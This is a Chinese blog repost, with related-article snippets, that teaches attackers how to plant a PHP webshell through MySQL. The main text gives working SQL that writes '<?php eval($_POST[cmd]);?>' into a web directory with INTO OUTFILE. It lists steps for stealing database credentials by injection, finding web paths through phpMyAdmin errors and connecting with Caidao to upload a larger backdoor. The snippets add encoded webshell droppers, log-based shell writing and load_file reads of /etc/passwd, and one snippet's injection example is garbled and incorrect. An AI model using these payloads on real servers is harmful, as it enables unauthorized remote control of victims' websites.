通过mysql写入一句话木马

最新推荐文章于 2025-03-29 22:23:20 发布
最新推荐文章于 2025-03-29 22:23:20 发布
阅读量2k 收藏 3
点赞数
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/cookies9/p/3364378.html
版权 
USE mysql;# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。
CREATE TABLE a(
cmd1 text NOT NULL
);# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。
INSERT INTO a( cmd1 )
VALUES (
'<?php eval($_POST[cmd]);?>'
);# 影响列数: 1
# 影响列数: 1
SELECT cmd1
FROM a
INTO OUTFILE '/data/www/heneng/cp/mm.php';# 影响列数: 1
# 影响列数: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。

1.首先通过注入获取mysql数据库的用户名和密码

2.通过相关渠道获取mysql数据库的路径

3.使用用户名和密码登陆mysql

4.获取网站可写目录的绝对路径

5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站

6.使用菜刀连接一句话,上传大马

 

方法二:

使用phpmyadmin中的sql语句
写文件:
select '<?php @eval($_POST[1])?>' into outfile '/data/www/heneng/cp/log.php'
最后的/cp/log.php的文件名可以任意起的,不是固定的。

 

利用mysql数据库爆网站绝对路径方法

使用phpmyadmin的某个文件报错
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/libraries/select_lang.lib.php

 

参考:360搜索“mysql写入一句话木马文件”

转载于:https://www.cnblogs.com/cookies9/p/3364378.html

aocong5568
关注
22-2.1 get基于报错的sql注入利用-读敏感文件和写入一句话木马
weixin_43263566的博客
01-25 351
通过这个查询语句,攻击者尝试将一段包含恶意PHP代码的字符串写入到一个指定的文件中,从而创建一个后门(backdoor)程序,可以让攻击者对受害者的服务器进行远程控制和操作。这是一个恶意的SQL注入攻击,它使用UNION注入的方式向数据库中插入一段包含恶意PHP代码的字符串,并将其存储到指定的文件中。因为我也不知道靶场的敏感文件是哪个,所以我就读取我们刚才注入的木马文件。判断MysQL的存储路径方便我们写入一句话马。双击刚才创建的连接就能进入目标的文件管理界面。在现实的情况下这种注入手段成功率很低。
sql注入之into outfile语句写入一句话木马
m0_63436163的博客
01-26 2148
into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;5)select
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2617
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
mysql 木马_通过mysql写入一句话木马
weixin_34641420的博客
01-27 1960
USEmysql;# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。CREATE TABLEa(cmd1text NOT NULL);# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。INSERT INTOa( cmd1 )VALUES('');# 影响列数:1# 影响列数:1SELECTcmd1FROMaINTO...
mysql日志注入一句话木马
最新发布
m0_73995253的博客
03-29 949
mysql有两个全局变量:general_log指的是日志保存状态,值为ON/OFF,general_log_file指的是日志的保存路径。只有当general_log为ON时,日志才会被记录进去,所以我们要先打开这个全局变量,使用命令查看全局变量状态‘使用命令打开打开之后,日志文件中就会记录我们写的sql语句(我们可以通过命令来设置日志文件地址(其中路径里的\用\\或者/代替,因为\的话会消失一个)
mysql写入一句话木马
热门推荐
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
mysqlphp木马_PHP一句话木马小总结与SQL语句写一句话木马
weixin_35755823的博客
01-27 373
一、基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来:1 2 相信一目了然可以看懂如何使用这类一句话。二、编码的替换的类型:1 2 //会生成34 @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));5 //ph...
mysql 一句话木马_通过mysql写入一句话木马
weixin_32522079的博客
01-18 1447
USEmysql;# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。CREATE TABLEa(cmd1text NOT NULL);# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。INSERT INTOa( cmd1 )VALUES('');# 影响列数:1# 影响列数:1SELECTcmd1FROMaINTO...
mysql木马一句话_phpmyadmin写一句话木马拿webshell思路(骇客协会)
weixin_39790877的博客
02-07 512
先介绍MySQL导出一句话木马的语法(我个人比较喜欢说思路)Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(' php eval_r($_POST[cmd]);?>'); //把一句话木...
phpmyadmin通过日志写入一句话木马
weixin_45983744的博客
12-26 4491
QQ交流群:876554035 1.想通过into outfile写入一句话木马 select ‘<?php assert($_POST[“cmd”];?)>’ into outfile ‘D:/phpstudy/PHPTutorial/WWW/xx.php’; 需要知道绝对路径 2.执行下来,报错 “MySQL服务器正在使用–secure-file-priv选项运行,因此它无法执行此...
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9542
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
mysql一句话
jihaichen的博客
05-06 1371
1、创建一个表create TABLE a (cmd text NOT NULL);2、插入数据insert INTO a (cmd) VALUES('&lt;?php eval($_POST[hihack]);?&gt;');3、导出一句话select cmd from a into outfile 'C:\AppServ\www\x.php';4、删除表Drop TABLE IF EXISTS...
mysql 写入慢_通过慢查询日志写入一句话木马
weixin_39724266的博客
12-21 667
微信搜一搜字母安全前提你得知道账号密码整个基本思路是这样...1.首先通过注入、弱口令爆破、社会工程学...等等获取mysql数据库的用户名和密码2.通过相关渠道(探针文件...等等)获取mysql数据库的登录地址3.使用用户名和密码登陆mysql4.获取网站可写目录的绝对路径5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站6.使用菜刀连接一句话木马1.登录phpMyAdm...
通过mysql写入php一句话木马
aituochang1886的博客
02-25 1468
利用mysql写入一句话木马 前提:   root权限,知道了服务器的web的绝对路径 select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\WWW\\22.php" 如果执行成功,生成D:\WWW\22.php,并写入 <?php @eval($_POST['pass']);?&gt...
针对MYSQL数据注入时用到的 load_file()函数
dibodang1423的博客
05-16 290
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)...
mysql写入木马getshell总结
orange777
02-25 6291
1、select into outfile写入木马 2、SQL语句利用日志写shell 3、sqlmap写入一句话getshell
MySQL日志写入木马
2301_76467680的博客
06-29 269
SET GLOBAL general_log = ON开启。
mysql一句话代码_mysql 写入一句话
weixin_39796140的博客
01-18 626
mysql 写入一句话方法一:1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启如果:secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv = ,没有的话添加上如果为一个目录,如:secure_file_priv = /hom...
如何利用sql注入漏洞写入一句话木马
11-05
SQL注入漏洞是一种常见的Web应用程序安全风险,攻击者通过构造特殊的SQL查询来欺骗数据库管理系统执行非预期的操作。如果系统没有正确的输入验证,就可能导致数据泄露或恶意数据写入。利用这个漏洞来植入一句话木马(也称为一句话后门)通常涉及以下步骤: 1. **识别漏洞**: 首先需要找到应用程序中的SQL查询点,这可能是表单提交、API请求或者是直接URL查询字符串中对数据库的调用。 2. **构建payload**: 一句话木马通常是通过创建一个SQL命令来实现的,比如在`INSERT`或`UPDATE`语句中添加一段恶意代码。例如,在MySQL中,可能会尝试注入类似这样的语句: ``` INSERT INTO users (username, password) VALUES ('admin', 'malicious_script;' --' OR '1'='1) ``` `'; --'`这部分就是木马代码片段,它可以被解释器忽略,并在之后追加新的行。 3. **执行恶意代码**: 当用户触发了这个注入,恶意代码会随着正常的查询一起发送到数据库。如果`OR '1'='1`部分执行成功,那么`--'`后面的语句会被当作注释处理,而不会影响查询结果,但脚本依然会被执行。 4. **隐藏木马**: 如果可能,可以将木马代码隐藏起来,例如使用转义序列或者混淆技术使其更难以检测。 5. **访问木马**: 一旦木马数据库中设置好,攻击者可以通过某种方式(如访问特定的URL、修改数据库查询等)触发执行木马,从而获得后门访问权限。 重要提示:在实际生产环境中,你应该严格管理数据库连接、参数化查询和限制用户输入,以防止此类攻击。对于已知的漏洞,应尽快修复并更新安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值